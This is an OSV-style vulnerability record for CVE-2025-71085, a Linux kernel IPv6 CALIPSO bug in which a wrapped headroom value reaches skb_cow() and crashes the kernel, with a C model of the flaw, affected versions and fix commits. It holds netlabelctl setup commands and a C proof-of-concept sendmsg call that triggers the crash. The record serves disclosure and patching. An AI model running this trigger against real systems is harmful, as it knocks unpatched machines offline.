CVE-2025-71085

Source
https://cve.org/CVERecord?id=CVE-2025-71085
Import Source
https://storage.googleapis.com/osv-test-cve-osv-conversion/osv-output/CVE-2025-71085.json
JSON Data
https://api.test.osv.dev/v1/vulns/CVE-2025-71085
Published
2026-01-13T15:34:48.324Z
Modified
2026-03-16T08:44:07.608350Z
Summary
ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr()
Details

In the Linux kernel, the following vulnerability has been resolved:

ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr()

There exists a kernel oops caused by a BUG_ON(nhead < 0) at net/core/skbuff.c:2232 in pskb_expand_head(). This bug is triggered as part of the calipso_skbuff_setattr() routine when skb_cow() is passed headroom > INT_MAX (i.e. (int)(skb_headroom(skb) + len_delta) < 0).

The root cause of the bug is due to an implicit integer cast in __skb_cow(). The check (headroom > skb_headroom(skb)) is meant to ensure that delta = headroom - skb_headroom(skb) is never negative, otherwise we will trigger a BUG_ON in pskb_expand_head(). However, if headroom > INT_MAX and delta <= -NET_SKB_PAD, the check passes, delta becomes negative, and pskb_expand_head() is passed a negative value for nhead.

Fix the trigger condition in calipso_skbuff_setattr(). Avoid passing "negative" headroom sizes to skb_cow() within calipso_skbuff_setattr() by only using skb_cow() to grow headroom.
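The following is a simplified user-space model, added here and not taken from the kernel or from the fix commit, of the unsigned-to-int cast the advisory describes and of the "only grow headroom" rule it adopts. NET_SKB_PAD = 64 and the headroom/len_delta values are assumptions constructed for the model.

```c
#include <limits.h>
#include <stdbool.h>
#include <stdio.h>

/* Model constants (assumed): NET_SKB_PAD is 64 on common configurations. */
#define NET_SKB_PAD 64
#define ALIGN(x, a) (((x) + (a) - 1) & ~((a) - 1))

/* Shape of the pre-fix check: 'headroom' is unsigned, but the difference is
 * stored in an int. Returns the nhead value handed to the expand routine. */
static int model_skb_cow_nhead(unsigned int cur_headroom, unsigned int headroom)
{
    int delta = 0;
    if (headroom > cur_headroom)          /* also passes when headroom > INT_MAX */
        delta = headroom - cur_headroom;  /* implicit unsigned -> int cast */
    return ALIGN(delta, NET_SKB_PAD);     /* stays negative once delta <= -NET_SKB_PAD */
}

/* Hardened caller modelled on the advisory's rule: only ever grow headroom.
 * A zero or negative len_delta requests no reallocation at all. */
static int hardened_setattr_nhead(unsigned int cur_headroom, int len_delta)
{
    if (len_delta <= 0)
        return 0;
    return model_skb_cow_nhead(cur_headroom, cur_headroom + (unsigned int)len_delta);
}

/* True if this nhead would trip BUG_ON(nhead < 0). */
static bool would_bug(int nhead) { return nhead < 0; }

int main(void)
{
    unsigned int cur = 64;  /* constructed current headroom */
    int len_delta = -100;   /* constructed: new header shorter than the old one */

    /* Pre-fix path: cur + len_delta wraps to a value above INT_MAX, the
     * "headroom > skb_headroom" check passes, and nhead comes out negative. */
    unsigned int headroom = cur + (unsigned int)len_delta;
    int nhead = model_skb_cow_nhead(cur, headroom);
    printf("pre-fix: headroom=%u nhead=%d bug=%d\n", headroom, nhead, would_bug(nhead));

    /* Fixed path: shrinking never reaches the cow helper. */
    nhead = hardened_setattr_nhead(cur, len_delta);
    printf("fixed:   nhead=%d bug=%d\n", nhead, would_bug(nhead));
    return 0;
}
```

A negative delta that is smaller in magnitude than NET_SKB_PAD is rounded up to 0 by ALIGN, which is why the advisory states the trigger as delta <= -NET_SKB_PAD.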

PoC: Using the netlabelctl tool:

    netlabelctl map del default
    netlabelctl calipso add pass doi:7
    netlabelctl map add default address:0::1/128 protocol:calipso,7

Then run the following PoC:

    int fd = socket(AF_INET6, SOCK_DGRAM, IPPROTO_UDP);

    // setup msghdr
    int cmsg_size = 2;
    int cmsg_len = 0x60;
    struct msghdr msg;
    struct sockaddr_in6 dest_addr;
    struct cmsghdr * cmsg = (struct cmsghdr *) calloc(1,
                    sizeof(struct cmsghdr) + cmsg_len);
    msg.msg_name = &dest_addr;
    msg.msg_namelen = sizeof(dest_addr);
    msg.msg_iov = NULL;
    msg.msg_iovlen = 0;
    msg.msg_control = cmsg;
    msg.msg_controllen = cmsg_len;
    msg.msg_flags = 0;

    // setup sockaddr
    dest_addr.sin6_family = AF_INET6;
    dest_addr.sin6_port = htons(31337);
    dest_addr.sin6_flowinfo = htonl(31337);
    dest_addr.sin6_addr = in6addr_loopback;
    dest_addr.sin6_scope_id = 31337;

    // setup cmsghdr
    cmsg->cmsg_len = cmsg_len;
    cmsg->cmsg_level = IPPROTO_IPV6;
    cmsg->cmsg_type = IPV6_HOPOPTS;
    char * hop_hdr = (char *)cmsg + sizeof(struct cmsghdr);
    hop_hdr[1] = 0x9; //set hop size - (0x9 + 1) * 8 = 80

    sendmsg(fd, &msg, 0);
Database specific
{
    "osv_generated_from": "https://github.com/CVEProject/cvelistV5/tree/main/cves/2025/71xxx/CVE-2025-71085.json",
    "cna_assigner": "Linux"
}
Affected packages

Git / git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git

Affected ranges

Type
GIT
Repo
https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git
Events
Introduced
2917f57b6bc15cc6787496ee5f2fdf17f0e9b7d3
Fixed
86f365897068d09418488165a68b23cb5baa37f2
Fixed
6b7522424529556c9cbc15e15e7bd4eeae310910
Fixed
2bb759062efa188ea5d07242a43e5aa5464bbae1
Fixed
c53aa6a5086f03f19564096ee084a202a8c738c0
Fixed
bf3709738d8a8cc6fa275773170c5c29511a0b24
Fixed
73744ad5696dce0e0f43872aba8de6a83d6ad570
Fixed
58fc7342b529803d3c221101102fe913df7adb83

Database specific

source
"https://storage.googleapis.com/osv-test-cve-osv-conversion/osv-output/CVE-2025-71085.json"

Linux / Kernel

Package

Name
Kernel

Affected ranges

Type
ECOSYSTEM
Events
Introduced
4.8.0
Fixed
5.10.248
Type
ECOSYSTEM
Events
Introduced
5.11.0
Fixed
5.15.198
Type
ECOSYSTEM
Events
Introduced
5.16.0
Fixed
6.1.160
Type
ECOSYSTEM
Events
Introduced
6.2.0
Fixed
6.6.120
Type
ECOSYSTEM
Events
Introduced
6.7.0
Fixed
6.12.64
Type
ECOSYSTEM
Events
Introduced
6.13.0
Fixed
6.18.4

Database specific

source
"https://storage.googleapis.com/osv-test-cve-osv-conversion/osv-output/CVE-2025-71085.json"